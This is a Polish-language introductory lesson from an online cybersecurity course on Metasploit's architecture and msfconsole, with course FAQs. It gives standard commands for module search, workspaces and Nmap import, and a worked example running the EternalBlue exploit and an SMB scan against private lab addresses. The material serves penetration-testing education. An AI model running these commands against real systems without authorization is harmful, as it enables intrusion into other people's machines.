Architektura Metasploit i msfconsole
Nauczą się Państwo poruszać po msfconsole, poznają strukturę exploitów, payloadów i modułów oraz skonfigurują opcje.
Architektura Metasploit i msfconsole to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 1 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Czym jest Metasploit?
Metasploit Framework to platforma open source do testów penetracyjnych, zapewniająca ujednolicony interfejs do tworzenia, testowania i uruchamiania exploitów. Jest standardowym w branży narzędziem do autoryzowanego wykorzystywania podatności w środowiskach laboratoryjnych.
Komponenty Metasploit
Najważniejsze komponenty to: msfconsole (interaktywny interfejs wiersza poleceń), msfvenom (generator payloadów), Metasploit DB (PostgreSQL do przechowywania hostów i sesji) oraz Armitage (graficzny interfejs).
Uruchamianie msfconsole
Uruchom msfconsole i zainicjalizuj bazę danych. Monit zmieni się na msf6 >. Uzupełnianie za pomocą klawisza Tab działa dla wszystkich poleceń, nazw modułów i opcji.
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.Typy modułów
Metasploit porządkuje funkcje według typów modułów: exploit (kod ataku przeznaczony dla konkretnej podatności), payload (kod uruchamiany po wykorzystaniu podatności), auxiliary (skanery i fuzzery), post (moduły po uzyskaniu dostępu), encoder oraz nop.
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modulesWyszukiwanie modułów
Polecenie search filtruje moduły według nazwy, CVE, platformy lub rangi. Ranga modułu wskazuje jego niezawodność: Excellent > Great > Good > Normal > Average > Low.
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17Korzystanie z modułu exploit
Wybierz moduł za pomocą use, wyświetl wymagane opcje poleceniem show options, ustaw wartości za pomocą set, a następnie uruchom moduł poleceniem run lub exploit.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > runUstawianie opcji globalnych
setg ustawia opcje globalnie dla wszystkich kolejnych modułów — jest to przydatne w przypadku LHOST, LPORT i RHOSTS, które pozostają niezmienne przez cały czas trwania testu.
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOSTModuły auxiliary
Moduły auxiliary wykonują skanowanie, enumerację i fuzzing bez dostarczania payloadów. Przykłady to skaner wersji SMB, narzędzie do brute force logowania SSH oraz skaner katalogów HTTP.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > runZarządzanie obszarami roboczymi
Obszary robocze porządkują dane ze skanowania i sesje według testu. Na początku każdej oceny utwórz nowy obszar roboczy, aby zachować rozdzielenie danych.
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesIntegracja z Nmap
Importuj wyniki skanowania Nmap w formacie XML bezpośrednio do bazy danych Metasploit, aby wypełnić tabele hostów i usług oraz umożliwić wybór odpowiednich modułów.
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445Pomoc i dokumentacja
Każdy moduł ma wbudowaną dokumentację. Użyj polecenia info, aby przeczytać opis modułu, ocenę niezawodności, odwołania (CVE i biuletyny) oraz wymagane opcje.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rankSzybki sprawdzian
Które polecenie wybiera moduł w msfconsole?
Podsumowanie: architektura Metasploit
msfconsole to centralny interfejs: służy do wyszukiwania modułów, ustawiania opcji, uruchamiania exploitów i zarządzania sesjami. Zawsze pracuj w nazwanym obszarze roboczym, importuj wyniki Nmap, aby wypełnić bazę danych, i czytaj informacje o module przed jego uruchomieniem — rozumiej, co i dlaczego uruchamiasz.
Często zadawane pytania
Czy lekcja „Architektura Metasploit i msfconsole” jest bezpłatna?
Tak — pełny tekst „Architektura Metasploit i msfconsole” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Architektura Metasploit i msfconsole”?
Nauczą się Państwo poruszać po msfconsole, poznają strukturę exploitów, payloadów i modułów oraz skonfigurują opcje. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?
Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 1 z 4.
Ile czasu zajmuje lekcja „Architektura Metasploit i msfconsole”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?
Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Architektura Metasploit i msfconsole
- Wykorzystanie znanej podatności
- Payloady: staged, stageless i Meterpreter
- Po uzyskaniu dostępu: pivoting i utrzymanie dostępu